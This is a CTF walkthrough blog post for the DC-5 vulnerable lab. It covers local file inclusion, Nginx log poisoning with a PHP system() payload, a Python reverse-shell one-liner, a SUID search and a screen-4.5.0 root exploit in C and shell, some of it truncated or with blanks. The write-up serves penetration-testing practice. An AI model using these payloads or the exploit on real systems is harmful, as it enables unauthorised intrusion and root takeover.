Hack. Sleep. Repeat

View on GitHub


DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu May 27 05:45:51 2021 as: nmap -sC -p- -sV -oA nmap
Nmap scan report for DC-5 (
Host is up (0.0015s latency).
Not shown: 65532 closed ports
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47835/udp   status
|   100024  1          51334/udp6  status
|   100024  1          52216/tcp   status
|_  100024  1          54172/tcp6  status
52216/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu May 27 05:46:08 2021 -- 1 IP address (1 host up) scanned in 16.99 seconds

Scanning for full ports give us 3 open port but since the lab only focus on the port 80 HTTP let hit it to start enumerating.


We are on the webpage let look around and find something vulnerable spend sometime checking so i landed on the contact page.


Let try to contact them and also checking for sql injection but nop not the way in so checking the url we have after sending them a mail. looking like LFI right?? sound interesting.


Not going to lie getting the right parameter is a really pain but guess what we learn everyday it something simple but my mind was not set there at all so let continue. here the right parameter is file probably by guessing to took me long.


LFI To SHELL Through Log Poisoning

We know our web server is Nginx so to poison it is easy since we know the path with the help of little research from google.

let intercept our request with burp and send it to the repeater tab in burp <?php system ($_GET['rev']) ?>


Let confirm it if we poisoning it


Boom defintely we do let run some command back to our burp /var/log/nginx/error.log&rev=ls the path am talking about with a little twist that we added to poison the web server.


Getting Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

NOTE:- edit the port and IP and also start an Ncat listener now let run it to get our shell.


Shell below;


Spawning a TTY shell making shell stable also to make so cool to use i know i love using the words cool lol .

python -c'import pty; pty.spawn ("/bin/bash")' and i think we are good to go.


Checking all folder found nothing so i decided to check for SUID with find / -perm -u=s -type f 2>/dev/null to list out SUID files.


Seems we have /bin/screen-4.5.0 let check for exploit.



Privilege Escalation

We have to do now is to create the exploit we have already but we some fixing to do.


Now let do the right thing.

#include <stdio.h>                                                                 
#include <sys/types.h>       
#include <unistd.h>                                                                                                                                                    
__attribute__ ((__constructor__))                                                                                                                                      
void dropshell(void){                                                                                                                                                  
    chown("/tmp/rootshell", 0, 0);                                                                                                                                     
    chmod("/tmp/rootshell", 04755);                                                                                                                                    
    printf("[+] done!\n");

Let save it in a file name exploit.c

#include <stdio.h>
int main(void){                          
    execvp("/bin/sh", NULL, NULL);

Let save in a file name rootshell.c

echo "[+] Now we create our /etc/ file..."
cd /etc
umask 000 # because
screen -D -m -L echo -ne  "\x0a/tmp/" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

Let save it in a file name


Now we need to compile it.

gcc -fPIC -shared -ldl -o exploit.c
gcc -o rootshell rootshell.c


Now let upload it on the target.


We have all files on the target now let give the file with the name permission chmod +x now let run it.


Rooooooooooooooooooot let now get the flag.txt.


Box rooted and we are done.

Greeting From Muzec

Back To Home